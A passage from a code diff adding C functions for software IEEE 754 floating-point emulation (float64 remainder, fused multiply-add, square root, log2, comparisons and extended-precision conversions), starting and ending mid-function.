bSig ) return propagateFloat64NaN( a, b STATUS_VAR ); + float_raise( float_flag_invalid STATUS_VAR); + return float64_default_nan; + } + return packFloat64( zSign, 0x7FF, 0 ); + } + if ( bExp == 0x7FF ) { + if ( bSig ) return propagateFloat64NaN( a, b STATUS_VAR ); + return packFloat64( zSign, 0, 0 ); + } + if ( bExp == 0 ) { + if ( bSig == 0 ) { + if ( ( aExp | aSig ) == 0 ) { + float_raise( float_flag_invalid STATUS_VAR); + return float64_default_nan; + } + float_raise( float_flag_divbyzero STATUS_VAR); + return packFloat64( zSign, 0x7FF, 0 ); + } + normalizeFloat64Subnormal( bSig, &bExp, &bSig ); + } + if ( aExp == 0 ) { + if ( aSig == 0 ) return packFloat64( zSign, 0, 0 ); + normalizeFloat64Subnormal( aSig, &aExp, &aSig ); + } + zExp = aExp - bExp + 0x3FD; + aSig = ( aSig | LIT64( 0x0010000000000000 ) )<<10; + bSig = ( bSig | LIT64( 0x0010000000000000 ) )<<11; + if ( bSig <= ( aSig + aSig ) ) { + aSig >>= 1; + ++zExp; + } + zSig = estimateDiv128To64( aSig, 0, bSig ); + if ( ( zSig & 0x1FF ) <= 2 ) { + mul64To128( bSig, zSig, &term0, &term1 ); + sub128( aSig, 0, term0, term1, &rem0, &rem1 ); + while ( (int64_t) rem0 < 0 ) { + --zSig; + add128( rem0, rem1, 0, bSig, &rem0, &rem1 ); + } + zSig |= ( rem1 != 0 ); + } + return roundAndPackFloat64( zSign, zExp, zSig STATUS_VAR ); + +} + +/*---------------------------------------------------------------------------- +| Returns the remainder of the double-precision floating-point value `a' +| with respect to the corresponding value `b'. The operation is performed +| according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +float64 float64_rem( float64 a, float64 b STATUS_PARAM ) +{ + flag aSign, zSign; + int_fast16_t aExp, bExp, expDiff; + uint64_t aSig, bSig; + uint64_t q, alternateASig; + int64_t sigMean; + + a = float64_squash_input_denormal(a STATUS_VAR); + b = float64_squash_input_denormal(b STATUS_VAR); + aSig = extractFloat64Frac( a ); + aExp = extractFloat64Exp( a ); + aSign = extractFloat64Sign( a ); + bSig = extractFloat64Frac( b ); + bExp = extractFloat64Exp( b ); + if ( aExp == 0x7FF ) { + if ( aSig || ( ( bExp == 0x7FF ) && bSig ) ) { + return propagateFloat64NaN( a, b STATUS_VAR ); + } + float_raise( float_flag_invalid STATUS_VAR); + return float64_default_nan; + } + if ( bExp == 0x7FF ) { + if ( bSig ) return propagateFloat64NaN( a, b STATUS_VAR ); + return a; + } + if ( bExp == 0 ) { + if ( bSig == 0 ) { + float_raise( float_flag_invalid STATUS_VAR); + return float64_default_nan; + } + normalizeFloat64Subnormal( bSig, &bExp, &bSig ); + } + if ( aExp == 0 ) { + if ( aSig == 0 ) return a; + normalizeFloat64Subnormal( aSig, &aExp, &aSig ); + } + expDiff = aExp - bExp; + aSig = ( aSig | LIT64( 0x0010000000000000 ) )<<11; + bSig = ( bSig | LIT64( 0x0010000000000000 ) )<<11; + if ( expDiff < 0 ) { + if ( expDiff < -1 ) return a; + aSig >>= 1; + } + q = ( bSig <= aSig ); + if ( q ) aSig -= bSig; + expDiff -= 64; + while ( 0 < expDiff ) { + q = estimateDiv128To64( aSig, 0, bSig ); + q = ( 2 < q ) ? q - 2 : 0; + aSig = 0- ( ( bSig>>2 ) * q ); + expDiff -= 62; + } + expDiff += 64; + if ( 0 < expDiff ) { + q = estimateDiv128To64( aSig, 0, bSig ); + q = ( 2 < q ) ? q - 2 : 0; + q >>= 64 - expDiff; + bSig >>= 2; + aSig = ( ( aSig>>1 )<<( expDiff - 1 ) ) - bSig * q; + } + else { + aSig >>= 2; + bSig >>= 2; + } + do { + alternateASig = aSig; + ++q; + aSig -= bSig; + } while ( 0 <= (int64_t) aSig ); + sigMean = aSig + alternateASig; + if ( ( sigMean < 0 ) || ( ( sigMean == 0 ) && ( q & 1 ) ) ) { + aSig = alternateASig; + } + zSign = ( (int64_t) aSig < 0 ); + if ( zSign ) aSig = 0- aSig; + return normalizeRoundAndPackFloat64( aSign ^ zSign, bExp, aSig STATUS_VAR ); + +} + +/*---------------------------------------------------------------------------- +| Returns the result of multiplying the double-precision floating-point values +| `a' and `b' then adding 'c', with no intermediate rounding step after the +| multiplication. The operation is performed according to the IEC/IEEE +| Standard for Binary Floating-Point Arithmetic 754-2008. +| The flags argument allows the caller to select negation of the +| addend, the intermediate product, or the final result. (The difference +| between this and having the caller do a separate negation is that negating +| externally will flip the sign bit on NaNs.) +*----------------------------------------------------------------------------*/ + +float64 float64_muladd(float64 a, float64 b, float64 c, int flags STATUS_PARAM) +{ + flag aSign, bSign, cSign, zSign; + int_fast16_t aExp, bExp, cExp, pExp, zExp, expDiff; + uint64_t aSig, bSig, cSig; + flag pInf, pZero, pSign; + uint64_t pSig0, pSig1, cSig0, cSig1, zSig0, zSig1; + int shiftcount; + flag signflip, infzero; + + a = float64_squash_input_denormal(a STATUS_VAR); + b = float64_squash_input_denormal(b STATUS_VAR); + c = float64_squash_input_denormal(c STATUS_VAR); + aSig = extractFloat64Frac(a); + aExp = extractFloat64Exp(a); + aSign = extractFloat64Sign(a); + bSig = extractFloat64Frac(b); + bExp = extractFloat64Exp(b); + bSign = extractFloat64Sign(b); + cSig = extractFloat64Frac(c); + cExp = extractFloat64Exp(c); + cSign = extractFloat64Sign(c); + + infzero = ((aExp == 0 && aSig == 0 && bExp == 0x7ff && bSig == 0) || + (aExp == 0x7ff && aSig == 0 && bExp == 0 && bSig == 0)); + + /* It is implementation-defined whether the cases of (0,inf,qnan) + * and (inf,0,qnan) raise InvalidOperation or not (and what QNaN + * they return if they do), so we have to hand this information + * off to the target-specific pick-a-NaN routine. + */ + if (((aExp == 0x7ff) && aSig) || + ((bExp == 0x7ff) && bSig) || + ((cExp == 0x7ff) && cSig)) { + return propagateFloat64MulAddNaN(a, b, c, infzero STATUS_VAR); + } + + if (infzero) { + float_raise(float_flag_invalid STATUS_VAR); + return float64_default_nan; + } + + if (flags & float_muladd_negate_c) { + cSign ^= 1; + } + + signflip = (flags & float_muladd_negate_result) ? 1 : 0; + + /* Work out the sign and type of the product */ + pSign = aSign ^ bSign; + if (flags & float_muladd_negate_product) { + pSign ^= 1; + } + pInf = (aExp == 0x7ff) || (bExp == 0x7ff); + pZero = ((aExp | aSig) == 0) || ((bExp | bSig) == 0); + + if (cExp == 0x7ff) { + if (pInf && (pSign ^ cSign)) { + /* addition of opposite-signed infinities => InvalidOperation */ + float_raise(float_flag_invalid STATUS_VAR); + return float64_default_nan; + } + /* Otherwise generate an infinity of the same sign */ + return packFloat64(cSign ^ signflip, 0x7ff, 0); + } + + if (pInf) { + return packFloat64(pSign ^ signflip, 0x7ff, 0); + } + + if (pZero) { + if (cExp == 0) { + if (cSig == 0) { + /* Adding two exact zeroes */ + if (pSign == cSign) { + zSign = pSign; + } else if (STATUS(float_rounding_mode) == float_round_down) { + zSign = 1; + } else { + zSign = 0; + } + return packFloat64(zSign ^ signflip, 0, 0); + } + /* Exact zero plus a denorm */ + if (STATUS(flush_to_zero)) { + float_raise(float_flag_output_denormal STATUS_VAR); + return packFloat64(cSign ^ signflip, 0, 0); + } + } + /* Zero plus something non-zero : just return the something */ + if (flags & float_muladd_halve_result) { + if (cExp == 0) { + normalizeFloat64Subnormal(cSig, &cExp, &cSig); + } + /* Subtract one to halve, and one again because roundAndPackFloat64 + * wants one less than the true exponent. + */ + cExp -= 2; + cSig = (cSig | 0x0010000000000000ULL) << 10; + return roundAndPackFloat64(cSign ^ signflip, cExp, cSig STATUS_VAR); + } + return packFloat64(cSign ^ signflip, cExp, cSig); + } + + if (aExp == 0) { + normalizeFloat64Subnormal(aSig, &aExp, &aSig); + } + if (bExp == 0) { + normalizeFloat64Subnormal(bSig, &bExp, &bSig); + } + + /* Calculate the actual result a * b + c */ + + /* Multiply first; this is easy. */ + /* NB: we subtract 0x3fe where float64_mul() subtracts 0x3ff + * because we want the true exponent, not the "one-less-than" + * flavour that roundAndPackFloat64() takes. + */ + pExp = aExp + bExp - 0x3fe; + aSig = (aSig | LIT64(0x0010000000000000))<<10; + bSig = (bSig | LIT64(0x0010000000000000))<<11; + mul64To128(aSig, bSig, &pSig0, &pSig1); + if ((int64_t)(pSig0 << 1) >= 0) { + shortShift128Left(pSig0, pSig1, 1, &pSig0, &pSig1); + pExp--; + } + + zSign = pSign ^ signflip; + + /* Now [pSig0:pSig1] is the significand of the multiply, with the explicit + * bit in position 126. + */ + if (cExp == 0) { + if (!cSig) { + /* Throw out the special case of c being an exact zero now */ + shift128RightJamming(pSig0, pSig1, 64, &pSig0, &pSig1); + if (flags & float_muladd_halve_result) { + pExp--; + } + return roundAndPackFloat64(zSign, pExp - 1, + pSig1 STATUS_VAR); + } + normalizeFloat64Subnormal(cSig, &cExp, &cSig); + } + + /* Shift cSig and add the explicit bit so [cSig0:cSig1] is the + * significand of the addend, with the explicit bit in position 126. + */ + cSig0 = cSig << (126 - 64 - 52); + cSig1 = 0; + cSig0 |= LIT64(0x4000000000000000); + expDiff = pExp - cExp; + + if (pSign == cSign) { + /* Addition */ + if (expDiff > 0) { + /* scale c to match p */ + shift128RightJamming(cSig0, cSig1, expDiff, &cSig0, &cSig1); + zExp = pExp; + } else if (expDiff < 0) { + /* scale p to match c */ + shift128RightJamming(pSig0, pSig1, -expDiff, &pSig0, &pSig1); + zExp = cExp; + } else { + /* no scaling needed */ + zExp = cExp; + } + /* Add significands and make sure explicit bit ends up in posn 126 */ + add128(pSig0, pSig1, cSig0, cSig1, &zSig0, &zSig1); + if ((int64_t)zSig0 < 0) { + shift128RightJamming(zSig0, zSig1, 1, &zSig0, &zSig1); + } else { + zExp--; + } + shift128RightJamming(zSig0, zSig1, 64, &zSig0, &zSig1); + if (flags & float_muladd_halve_result) { + zExp--; + } + return roundAndPackFloat64(zSign, zExp, zSig1 STATUS_VAR); + } else { + /* Subtraction */ + if (expDiff > 0) { + shift128RightJamming(cSig0, cSig1, expDiff, &cSig0, &cSig1); + sub128(pSig0, pSig1, cSig0, cSig1, &zSig0, &zSig1); + zExp = pExp; + } else if (expDiff < 0) { + shift128RightJamming(pSig0, pSig1, -expDiff, &pSig0, &pSig1); + sub128(cSig0, cSig1, pSig0, pSig1, &zSig0, &zSig1); + zExp = cExp; + zSign ^= 1; + } else { + zExp = pExp; + if (lt128(cSig0, cSig1, pSig0, pSig1)) { + sub128(pSig0, pSig1, cSig0, cSig1, &zSig0, &zSig1); + } else if (lt128(pSig0, pSig1, cSig0, cSig1)) { + sub128(cSig0, cSig1, pSig0, pSig1, &zSig0, &zSig1); + zSign ^= 1; + } else { + /* Exact zero */ + zSign = signflip; + if (STATUS(float_rounding_mode) == float_round_down) { + zSign ^= 1; + } + return packFloat64(zSign, 0, 0); + } + } + --zExp; + /* Do the equivalent of normalizeRoundAndPackFloat64() but + * starting with the significand in a pair of uint64_t. + */ + if (zSig0) { + shiftcount = countLeadingZeros64(zSig0) - 1; + shortShift128Left(zSig0, zSig1, shiftcount, &zSig0, &zSig1); + if (zSig1) { + zSig0 |= 1; + } + zExp -= shiftcount; + } else { + shiftcount = countLeadingZeros64(zSig1); + if (shiftcount == 0) { + zSig0 = (zSig1 >> 1) | (zSig1 & 1); + zExp -= 63; + } else { + shiftcount--; + zSig0 = zSig1 << shiftcount; + zExp -= (shiftcount + 64); + } + } + if (flags & float_muladd_halve_result) { + zExp--; + } + return roundAndPackFloat64(zSign, zExp, zSig0 STATUS_VAR); + } +} + +/*---------------------------------------------------------------------------- +| Returns the square root of the double-precision floating-point value `a'. +| The operation is performed according to the IEC/IEEE Standard for Binary +| Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +float64 float64_sqrt( float64 a STATUS_PARAM ) +{ + flag aSign; + int_fast16_t aExp, zExp; + uint64_t aSig, zSig, doubleZSig; + uint64_t rem0, rem1, term0, term1; + a = float64_squash_input_denormal(a STATUS_VAR); + + aSig = extractFloat64Frac( a ); + aExp = extractFloat64Exp( a ); + aSign = extractFloat64Sign( a ); + if ( aExp == 0x7FF ) { + if ( aSig ) return propagateFloat64NaN( a, a STATUS_VAR ); + if ( ! aSign ) return a; + float_raise( float_flag_invalid STATUS_VAR); + return float64_default_nan; + } + if ( aSign ) { + if ( ( aExp | aSig ) == 0 ) return a; + float_raise( float_flag_invalid STATUS_VAR); + return float64_default_nan; + } + if ( aExp == 0 ) { + if ( aSig == 0 ) return float64_zero; + normalizeFloat64Subnormal( aSig, &aExp, &aSig ); + } + zExp = ( ( aExp - 0x3FF )>>1 ) + 0x3FE; + aSig |= LIT64( 0x0010000000000000 ); + zSig = estimateSqrt32( aExp, (uint32_t)(aSig>>21) ); + aSig <<= 9 - ( aExp & 1 ); + zSig = estimateDiv128To64( aSig, 0, zSig<<32 ) + ( zSig<<30 ); + if ( ( zSig & 0x1FF ) <= 5 ) { + doubleZSig = zSig<<1; + mul64To128( zSig, zSig, &term0, &term1 ); + sub128( aSig, 0, term0, term1, &rem0, &rem1 ); + while ( (int64_t) rem0 < 0 ) { + --zSig; + doubleZSig -= 2; + add128( rem0, rem1, zSig>>63, doubleZSig | 1, &rem0, &rem1 ); + } + zSig |= ( ( rem0 | rem1 ) != 0 ); + } + return roundAndPackFloat64( 0, zExp, zSig STATUS_VAR ); + +} + +/*---------------------------------------------------------------------------- +| Returns the binary log of the double-precision floating-point value `a'. +| The operation is performed according to the IEC/IEEE Standard for Binary +| Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ +float64 float64_log2( float64 a STATUS_PARAM ) +{ + flag aSign, zSign; + int_fast16_t aExp; + uint64_t aSig, aSig0, aSig1, zSig, i; + a = float64_squash_input_denormal(a STATUS_VAR); + + aSig = extractFloat64Frac( a ); + aExp = extractFloat64Exp( a ); + aSign = extractFloat64Sign( a ); + + if ( aExp == 0 ) { + if ( aSig == 0 ) return packFloat64( 1, 0x7FF, 0 ); + normalizeFloat64Subnormal( aSig, &aExp, &aSig ); + } + if ( aSign ) { + float_raise( float_flag_invalid STATUS_VAR); + return float64_default_nan; + } + if ( aExp == 0x7FF ) { + if ( aSig ) return propagateFloat64NaN( a, float64_zero STATUS_VAR ); + return a; + } + + aExp -= 0x3FF; + aSig |= LIT64( 0x0010000000000000 ); + zSign = aExp < 0; + zSig = (uint64_t)aExp << 52; + for (i = 1LL << 51; i > 0; i >>= 1) { + mul64To128( aSig, aSig, &aSig0, &aSig1 ); + aSig = ( aSig0 << 12 ) | ( aSig1 >> 52 ); + if ( aSig & LIT64( 0x0020000000000000 ) ) { + aSig >>= 1; + zSig |= i; + } + } + + if ( zSign ) + zSig = 0-zSig; + return normalizeRoundAndPackFloat64( zSign, 0x408, zSig STATUS_VAR ); +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the double-precision floating-point value `a' is equal to the +| corresponding value `b', and 0 otherwise. The invalid exception is raised +| if either operand is a NaN. Otherwise, the comparison is performed +| according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +int float64_eq( float64 a, float64 b STATUS_PARAM ) +{ + uint64_t av, bv; + a = float64_squash_input_denormal(a STATUS_VAR); + b = float64_squash_input_denormal(b STATUS_VAR); + + if ( ( ( extractFloat64Exp( a ) == 0x7FF ) && extractFloat64Frac( a ) ) + || ( ( extractFloat64Exp( b ) == 0x7FF ) && extractFloat64Frac( b ) ) + ) { + float_raise( float_flag_invalid STATUS_VAR); + return 0; + } + av = float64_val(a); + bv = float64_val(b); + return ( av == bv ) || ( (uint64_t) ( ( av | bv )<<1 ) == 0 ); + +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the double-precision floating-point value `a' is less than or +| equal to the corresponding value `b', and 0 otherwise. The invalid +| exception is raised if either operand is a NaN. The comparison is performed +| according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +int float64_le( float64 a, float64 b STATUS_PARAM ) +{ + flag aSign, bSign; + uint64_t av, bv; + a = float64_squash_input_denormal(a STATUS_VAR); + b = float64_squash_input_denormal(b STATUS_VAR); + + if ( ( ( extractFloat64Exp( a ) == 0x7FF ) && extractFloat64Frac( a ) ) + || ( ( extractFloat64Exp( b ) == 0x7FF ) && extractFloat64Frac( b ) ) + ) { + float_raise( float_flag_invalid STATUS_VAR); + return 0; + } + aSign = extractFloat64Sign( a ); + bSign = extractFloat64Sign( b ); + av = float64_val(a); + bv = float64_val(b); + if ( aSign != bSign ) return aSign || ( (uint64_t) ( ( av | bv )<<1 ) == 0 ); + return ( av == bv ) || ( aSign ^ ( av < bv ) ); + +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the double-precision floating-point value `a' is less than +| the corresponding value `b', and 0 otherwise. The invalid exception is +| raised if either operand is a NaN. The comparison is performed according +| to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +int float64_lt( float64 a, float64 b STATUS_PARAM ) +{ + flag aSign, bSign; + uint64_t av, bv; + + a = float64_squash_input_denormal(a STATUS_VAR); + b = float64_squash_input_denormal(b STATUS_VAR); + if ( ( ( extractFloat64Exp( a ) == 0x7FF ) && extractFloat64Frac( a ) ) + || ( ( extractFloat64Exp( b ) == 0x7FF ) && extractFloat64Frac( b ) ) + ) { + float_raise( float_flag_invalid STATUS_VAR); + return 0; + } + aSign = extractFloat64Sign( a ); + bSign = extractFloat64Sign( b ); + av = float64_val(a); + bv = float64_val(b); + if ( aSign != bSign ) return aSign && ( (uint64_t) ( ( av | bv )<<1 ) != 0 ); + return ( av != bv ) && ( aSign ^ ( av < bv ) ); + +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the double-precision floating-point values `a' and `b' cannot +| be compared, and 0 otherwise. The invalid exception is raised if either +| operand is a NaN. The comparison is performed according to the IEC/IEEE +| Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +int float64_unordered( float64 a, float64 b STATUS_PARAM ) +{ + a = float64_squash_input_denormal(a STATUS_VAR); + b = float64_squash_input_denormal(b STATUS_VAR); + + if ( ( ( extractFloat64Exp( a ) == 0x7FF ) && extractFloat64Frac( a ) ) + || ( ( extractFloat64Exp( b ) == 0x7FF ) && extractFloat64Frac( b ) ) + ) { + float_raise( float_flag_invalid STATUS_VAR); + return 1; + } + return 0; +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the double-precision floating-point value `a' is equal to the +| corresponding value `b', and 0 otherwise. Quiet NaNs do not cause an +| exception.The comparison is performed according to the IEC/IEEE Standard +| for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +int float64_eq_quiet( float64 a, float64 b STATUS_PARAM ) +{ + uint64_t av, bv; + a = float64_squash_input_denormal(a STATUS_VAR); + b = float64_squash_input_denormal(b STATUS_VAR); + + if ( ( ( extractFloat64Exp( a ) == 0x7FF ) && extractFloat64Frac( a ) ) + || ( ( extractFloat64Exp( b ) == 0x7FF ) && extractFloat64Frac( b ) ) + ) { + if ( float64_is_signaling_nan( a ) || float64_is_signaling_nan( b ) ) { + float_raise( float_flag_invalid STATUS_VAR); + } + return 0; + } + av = float64_val(a); + bv = float64_val(b); + return ( av == bv ) || ( (uint64_t) ( ( av | bv )<<1 ) == 0 ); + +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the double-precision floating-point value `a' is less than or +| equal to the corresponding value `b', and 0 otherwise. Quiet NaNs do not +| cause an exception. Otherwise, the comparison is performed according to the +| IEC/IEEE Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +int float64_le_quiet( float64 a, float64 b STATUS_PARAM ) +{ + flag aSign, bSign; + uint64_t av, bv; + a = float64_squash_input_denormal(a STATUS_VAR); + b = float64_squash_input_denormal(b STATUS_VAR); + + if ( ( ( extractFloat64Exp( a ) == 0x7FF ) && extractFloat64Frac( a ) ) + || ( ( extractFloat64Exp( b ) == 0x7FF ) && extractFloat64Frac( b ) ) + ) { + if ( float64_is_signaling_nan( a ) || float64_is_signaling_nan( b ) ) { + float_raise( float_flag_invalid STATUS_VAR); + } + return 0; + } + aSign = extractFloat64Sign( a ); + bSign = extractFloat64Sign( b ); + av = float64_val(a); + bv = float64_val(b); + if ( aSign != bSign ) return aSign || ( (uint64_t) ( ( av | bv )<<1 ) == 0 ); + return ( av == bv ) || ( aSign ^ ( av < bv ) ); + +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the double-precision floating-point value `a' is less than +| the corresponding value `b', and 0 otherwise. Quiet NaNs do not cause an +| exception. Otherwise, the comparison is performed according to the IEC/IEEE +| Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +int float64_lt_quiet( float64 a, float64 b STATUS_PARAM ) +{ + flag aSign, bSign; + uint64_t av, bv; + a = float64_squash_input_denormal(a STATUS_VAR); + b = float64_squash_input_denormal(b STATUS_VAR); + + if ( ( ( extractFloat64Exp( a ) == 0x7FF ) && extractFloat64Frac( a ) ) + || ( ( extractFloat64Exp( b ) == 0x7FF ) && extractFloat64Frac( b ) ) + ) { + if ( float64_is_signaling_nan( a ) || float64_is_signaling_nan( b ) ) { + float_raise( float_flag_invalid STATUS_VAR); + } + return 0; + } + aSign = extractFloat64Sign( a ); + bSign = extractFloat64Sign( b ); + av = float64_val(a); + bv = float64_val(b); + if ( aSign != bSign ) return aSign && ( (uint64_t) ( ( av | bv )<<1 ) != 0 ); + return ( av != bv ) && ( aSign ^ ( av < bv ) ); + +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the double-precision floating-point values `a' and `b' cannot +| be compared, and 0 otherwise. Quiet NaNs do not cause an exception. The +| comparison is performed according to the IEC/IEEE Standard for Binary +| Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +int float64_unordered_quiet( float64 a, float64 b STATUS_PARAM ) +{ + a = float64_squash_input_denormal(a STATUS_VAR); + b = float64_squash_input_denormal(b STATUS_VAR); + + if ( ( ( extractFloat64Exp( a ) == 0x7FF ) && extractFloat64Frac( a ) ) + || ( ( extractFloat64Exp( b ) == 0x7FF ) && extractFloat64Frac( b ) ) + ) { + if ( float64_is_signaling_nan( a ) || float64_is_signaling_nan( b ) ) { + float_raise( float_flag_invalid STATUS_VAR); + } + return 1; + } + return 0; +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the extended double-precision floating- +| point value `a' to the 32-bit two's complement integer format. The +| conversion is performed according to the IEC/IEEE Standard for Binary +| Floating-Point Arithmetic---which means in particular that the conversion +| is rounded according to the current rounding mode. If `a' is a NaN, the +| largest positive integer is returned. Otherwise, if the conversion +| overflows, the largest integer with the same sign as `a' is returned. +*----------------------------------------------------------------------------*/ + +int32 floatx80_to_int32( floatx80 a STATUS_PARAM ) +{ + flag aSign; + int32 aExp, shiftCount; + uint64_t aSig; + + if (floatx80_invalid_encoding(a)) { + float_raise(float_flag_invalid STATUS_VAR); + return (int32)(1U << 31); + } + aSig = extractFloatx80Frac( a ); + aExp = extractFloatx80Exp( a ); + aSign = extractFloatx80Sign( a ); + if ( ( aExp == 0x7FFF ) && (uint64_t) ( aSig<<1 ) ) aSign = 0; + shiftCount = 0x4037 - aExp; + if ( shiftCount <= 0 ) shiftCount = 1; + shift64RightJamming( aSig, shiftCount, &aSig ); + return roundAndPackInt32( aSign, aSig STATUS_VAR ); + +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the extended double-precision floating- +| point value `a' to the 32-bit two's complement integer format. The +| conversion is performed according to the IEC/IEEE Standard for Binary +| Floating-Point Arithmetic, except that the conversion is always rounded +| toward zero. If `a' is a NaN, the largest positive integer is returned. +| Otherwise, if the conversion overflows, the largest integer with the same +| sign as `a' is returned. +*----------------------------------------------------------------------------*/ + +int32 floatx80_to_int32_round_to_zero( floatx80 a STATUS_PARAM ) +{ + flag aSign; + int32 aExp, shiftCount; + uint64_t aSig, savedASig; + int32_t z; + + if (floatx80_invalid_encoding(a)) { + float_raise(float_flag_invalid STATUS_VAR); + return (int32)(1U << 31); + } + aSig = extractFloatx80Frac( a ); + aExp = extractFloatx80Exp( a ); + aSign = extractFloatx80Sign( a ); + if ( 0x401E < aExp ) { + if ( ( aExp == 0x7FFF ) && (uint64_t) ( aSig<<1 ) ) aSign = 0; + goto invalid; + } + else if ( aExp < 0x3FFF ) { + if ( aExp || aSig ) STATUS(float_exception_flags) |= float_flag_inexact; + return 0; + } + shiftCount = 0x403E - aExp; + savedASig = aSig; + aSig >>= shiftCount; + z = (int32_t)aSig; + if ( aSign && (z != 0x80000000) ) z = - z; + if ( ( z < 0 ) ^ aSign ) { + invalid: + float_raise( float_flag_invalid STATUS_VAR); + return aSign ? (int32_t) 0x80000000 : 0x7FFFFFFF; + } + if ( ( aSig<<shiftCount ) != savedASig ) { + STATUS(float_exception_flags) |= float_flag_inexact; + } + return z; + +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the extended double-precision floating- +| point value `a' to the 64-bit two's complement integer format. The +| conversion is performed according to the IEC/IEEE Standard for Binary +| Floating-Point Arithmetic---which means in particular that the conversion +| is rounded according to the current rounding mode. If `a' is a NaN, +| the largest positive integer is returned. Otherwise, if the conversion +| overflows, the largest integer with the same sign as `a' is returned. +*----------------------------------------------------------------------------*/ + +int64 floatx80_to_int64( floatx80 a STATUS_PARAM ) +{ + flag aSign; + int32 aExp, shiftCount; + uint64_t aSig, aSigExtra; + + if (floatx80_invalid_encoding(a)) { + float_raise(float_flag_invalid STATUS_VAR); + return (uint64_t)1 << 63; + } + aSig = extractFloatx80Frac( a ); + aExp = extractFloatx80Exp( a ); + aSign = extractFloatx80Sign( a ); + shiftCount = 0x403E - aExp; + if ( shiftCount <= 0 ) { + if ( shiftCount ) { + float_raise( float_flag_invalid STATUS_VAR); + if ( ! aSign + || ( ( aExp == 0x7FFF ) + && ( aSig != LIT64( 0x8000000000000000 ) ) ) + ) { + return LIT64( 0x7FFFFFFFFFFFFFFF ); + } + return (int64_t) LIT64( 0x8000000000000000 ); + } + aSigExtra = 0; + } + else { + shift64ExtraRightJamming( aSig, 0, shiftCount, &aSig, &aSigExtra ); + } + return roundAndPackInt64( aSign, aSig, aSigExtra STATUS_VAR ); + +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the extended double-precision floating- +| point value `a' to the 64-bit two's complement integer format. The +| conversion is performed according to the IEC/IEEE Standard for Binary +| Floating-Point Arithmetic, except that the conversion is always rounded +| toward zero. If `a' is a NaN, the largest positive integer is returned. +| Otherwise, if the conversion overflows, the largest integer with the same +| sign as `a' is returned. +*----------------------------------------------------------------------------*/ + +int64 floatx80_to_int64_round_to_zero( floatx80 a STATUS_PARAM ) +{ + flag aSign; + int32 aExp, shiftCount; + uint64_t aSig; + int64 z; + + if (floatx80_invalid_encoding(a)) { + float_raise(float_flag_invalid STATUS_VAR); + return (uint64_t)1 << 63; + } + aSig = extractFloatx80Frac( a ); + aExp = extractFloatx80Exp( a ); + aSign = extractFloatx80Sign( a ); + shiftCount = aExp - 0x403E; + if ( 0 <= shiftCount ) { + aSig &= LIT64( 0x7FFFFFFFFFFFFFFF ); + if ( ( a.high != 0xC03E ) || aSig ) { + float_raise( float_flag_invalid STATUS_VAR); + if ( ! aSign || ( ( aExp == 0x7FFF ) && aSig ) ) { + return LIT64( 0x7FFFFFFFFFFFFFFF ); + } + } + return (int64_t) LIT64( 0x8000000000000000 ); + } + else if ( aExp < 0x3FFF ) { + if ( aExp | aSig ) STATUS(float_exception_flags) |= float_flag_inexact; + return 0; + } + z = aSig>>( - shiftCount ); + if ( (uint64_t) ( aSig<<( shiftCount & 63 ) ) ) { + STATUS(float_exception_flags) |= float_flag_inexact; + } + if ( aSign ) z = - z; + return z; + +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the extended double-precision floating- +| point value `a' to the single-precision floating-point format. The +| conversion is performed according to the IEC/IEEE Standard for Binary +| Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +float32 floatx80_to_float32( floatx80 a STATUS_PARAM ) +{ + flag aSign; + int32 aExp; + uint64_t aSig; + + if (floatx80_invalid_encoding(a)) { + float_raise(float_flag_invalid STATUS_VAR); + return float32_default_nan; + } + aSig = extractFloatx80Frac( a ); + aExp = extractFloatx80Exp( a ); + aSign = extractFloatx80Sign( a ); + if ( aExp == 0x7FFF ) { + if ( (uint64_t) ( aSig<<1 ) ) { + return commonNaNToFloat32( floatx80ToCommonNaN( a STATUS_VAR ) STATUS_VAR ); + } + return packFloat32( aSign, 0xFF, 0 ); + } + shift64RightJamming( aSig, 33, &aSig ); + if ( aExp || aSig ) aExp -= 0x3F81; + return roundAndPackFloat32( aSign, aExp, (uint32_t)aSig STATUS_VAR ); + +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the extended double-precision floating- +| point value `a' to the double-precision floating-point format. The +| conversion is performed according to the IEC/IEEE Standard for Binary +| Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +float64 floatx80_to_float64( floatx80 a STATUS_PARAM ) +{ + flag aSign; + int32 aExp; + uint64_t aSig, zSig; + + if (floatx80_invalid_encoding(a)) { + float_raise(float_flag_invalid STATUS_VAR); + return float64_default_nan; + } + aSig = extractFloatx80Frac( a ); + aExp = extractFloatx80Exp( a ); + aSign = extractFloatx80Sign( a ); + if ( aExp == 0x7FFF ) { + if ( (uint64_t) ( aSig<<1 ) ) { + return commonNaNToFloat64( floatx80ToCommonNaN( a STATUS_VAR ) STATUS_VAR ); + } + return packFloat64( aSign, 0x7FF, 0 ); + } + shift64RightJamming( aSig, 1, &zSig ); + if ( aExp || aSig ) aExp -= 0x3C01; + return roundAndPackFloat64( aSign, aExp, zSig STATUS_VAR ); + +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the extended double-precision floating- +| point value 